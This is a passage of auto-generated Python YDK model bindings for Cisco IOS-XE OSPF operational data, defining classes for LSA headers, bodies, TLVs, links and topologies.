self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
])
self.name = None
self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value)
class Tlv(Entity):
"""
Link TLV
.. attribute:: link_type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: link_id
Link ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_if_ipv4_addr
List of local interface IPv4 addresses
**type**\: union of the below types:
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: list of str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: local_remote_ipv4_addr
List of remote interface IPv4 addresses
**type**\: union of the below types:
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: list of str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: te_metric
TE metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: max_bandwidth
Maximum bandwidth
**type**\: :py:class:`Decimal64<ydk.types.Decimal64>`
**range:** \-92233720368547758.08..92233720368547758.07
**config**\: False
.. attribute:: max_reservable_bandwidth
Maximum reservable bandwidth
**type**\: :py:class:`Decimal64<ydk.types.Decimal64>`
**range:** \-92233720368547758.08..92233720368547758.07
**config**\: False
.. attribute:: unreserved_bandwidth
Unrseerved bandwidth
**type**\: :py:class:`Decimal64<ydk.types.Decimal64>`
**range:** \-92233720368547758.08..92233720368547758.07
**config**\: False
.. attribute:: admin_group
Administrative group/Resource class/Color
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, self).__init__()
self.yang_name = "tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])),
('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])),
('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])),
('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])),
('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])),
('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])),
('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])),
])
self.link_type = None
self.link_id = None
self.local_if_ipv4_addr = []
self.local_remote_ipv4_addr = []
self.te_metric = None
self.max_bandwidth = None
self.max_reservable_bandwidth = None
self.unreserved_bandwidth = None
self.admin_group = None
self._segment_path = lambda: "tlv"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value)
class UnknownSubTlv(Entity):
"""
OSPFv2 Unknown sub TLV
.. attribute:: type (key)
TLV type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: length
TLV length
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: value
TLV value
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__()
self.yang_name = "unknown-sub-tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('value', (YLeafList(YType.uint8, 'value'), ['int'])),
])
self.type = None
self.length = None
self.value = []
self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value)
class AreaScopeLsa(Entity):
"""
List OSPF area scope LSA databases
.. attribute:: lsa_type (key)
LSA Type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adv_router (key)
Advertising router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: decoded_completed
The OSPF LSA body is fully decoded
**type**\: bool
**config**\: False
.. attribute:: raw_data
The complete LSA in network byte order as received/sent over the wire
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: ospfv2_lsa
OSPFv2 LSA
**type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa>`
**config**\: False
.. attribute:: ospfv2_link
Router LSA link
**type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link>`
**config**\: False
.. attribute:: ospfv2_topology
Summary LSA
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology>`
**config**\: False
.. attribute:: ospfv2_external
External LSA
**type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External>`
**config**\: False
.. attribute:: ospfv3_lsa
OSPFv3 LSA
**type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa>`
**config**\: False
.. attribute:: ospfv3_link
OSPFv3 links
**type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link>`
**config**\: False
.. attribute:: ospfv3_prefix
OSPFv3 prefix\-list
**type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix>`
**config**\: False
.. attribute:: ospfv3_ia_prefix
OSPFv3 intra\-area prefix\-list
**type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, self).__init__()
self.yang_name = "area-scope-lsa"
self.yang_parent_name = "intf-link-scope-lsas"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type','adv_router']
self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
])
self.lsa_type = None
self.adv_router = None
self.decoded_completed = None
self.raw_data = []
self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa()
self.ospfv3_lsa.parent = self
self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"
self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix = YList(self)
self.ospfv3_ia_prefix = YList(self)
self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
class Ospfv2Lsa(Entity):
"""
OSPFv2 LSA
.. attribute:: header
Decoded OSPFv2 LSA header data
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv2 LSA body data
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__()
self.yang_name = "ospfv2-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv2-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value)
class Header(Entity):
"""
Decoded OSPFv2 LSA header data
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: opaque_type
Opaque type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: opaque_id
Opaque ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: flag_options
LSA options
**type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
])
self.lsa_id = None
self.opaque_type = None
self.opaque_id = None
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self.flag_options = Bits()
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv2 LSA body data
.. attribute:: num_of_links
Number of links
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: network
Network details
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: summary_mask
Summary mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_mask
External mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: body_flag_options
LSA body flags
**type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))])
self._leafs = OrderedDict([
('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
])
self.num_of_links = None
self.summary_mask = None
self.external_mask = None
self.body_flag_options = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
class Network(Entity):
"""
Network details
.. attribute:: network_mask
IP network mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: attached_router
List of the routers attached to the network
**type**\: list of int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
])
self.network_mask = None
self.attached_router = []
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
"""
Router LSA link
.. attribute:: link_id (key)
Link ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_data (key)
Link data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: ospfv2_topology
Topology specific information
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__()
self.yang_name = "ospfv2-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_id','link_data']
self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))])
self._leafs = OrderedDict([
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
])
self.link_id = None
self.link_data = None
self.type = None
self.ospfv2_topology = YList(self)
self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
class Ospfv2Topology(Entity):
"""
Topology specific information
.. attribute:: mt_id (key)
MT\-ID for topology enabled link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "ospfv2-link"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
"""
Summary LSA
.. attribute:: mt_id (key)
MT\-ID for topology enabled link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
"""
External LSA
.. attribute:: mt_id (key)
MT\-ID for topology enabled on the link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
